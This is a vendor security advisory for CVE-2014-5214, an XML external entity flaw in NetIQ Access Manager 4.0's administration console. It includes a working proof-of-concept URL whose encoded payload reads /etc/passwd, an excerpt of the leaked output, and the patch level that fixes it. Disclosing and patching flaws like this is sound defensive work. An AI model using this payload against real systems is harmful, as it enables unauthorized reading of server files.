XML eXternal Entity Injection (XXE) vulnerability: Authenticated administrative users can download arbitrary files from the Access Manager administration interface as the user "novlwww" (CVE-2014-5214)

  • 7015993
  • 15-Dec-2014
  • 17-Dec-2014

Environment

NetIQ Access Manager 4.0
NetIQ Access Manager 4.0 Support Pack 1 HF2 applied
CVE-2014-5214

Situation

Access Manager 4.0 setup and working fine where uses can access protected resources behind the Access Gateway after having successfully authenticated against the Identity Server. However, it is possible to execute an XML eXternal Entity Injection (XXE - see https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing for more details) against the Access Manager Administration Console server running iManager.

As an example, the following URL demonstrates the retrieval of the /etc/passwd file as an authenticated administrative user:

https://147.2.33.233:2443/nps/servlet/webacc?taskId=fw.PreviewObjectFilter&nextState=initialState&merge=fw.TCPreviewFilter&query=%3C!DOCTYPE+request+[%0A%3C!ENTITY+include+SYSTEM+%22/etc/passwd%22%3E%0A]%3E%3Cquery%3E%3Ccontainer%3E%26include%3b%3C/container%3E%3Csubclasses%3Efalse%3C/subclasses%3E%3C/query%3E

The resulting message is displayed with all user specific info

Error Error: Invalid advanced selection
Container not found: at:x:25:25:
Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
ftp:x:40:49:FTP account:/srv/ftp:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:107:112:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
:
suse-ncc:x:106:111:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
uuidd:x:102:104:User for uuidd:/var/run/uuidd:/bin/false
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
ncashell:x:1000:100:ncashell:/home/ncashell:/bin/bash
novlwww:x:108:113:Novell System User:/var/opt/novell/novlwww:/bin/bash

CVE-2014-5214 has been created and assigned to this discovery.

Resolution

Apply Access Manager 4.0 Support Pack 1 Hot Fix 3 (4.0.1 HF3) or greater to address this issue.

Additional Information

NetIQ thanks Wolfgang Ettlinger (discovery, analysis, coordination) from the SEC Consult Vulnerability Lab (https://www.sec-consult.com/) for responsibly reporting the identified issues and working with us as we addressed them.

 

Feedback service temporarily unavailable. For content questions or problems, please contact Support.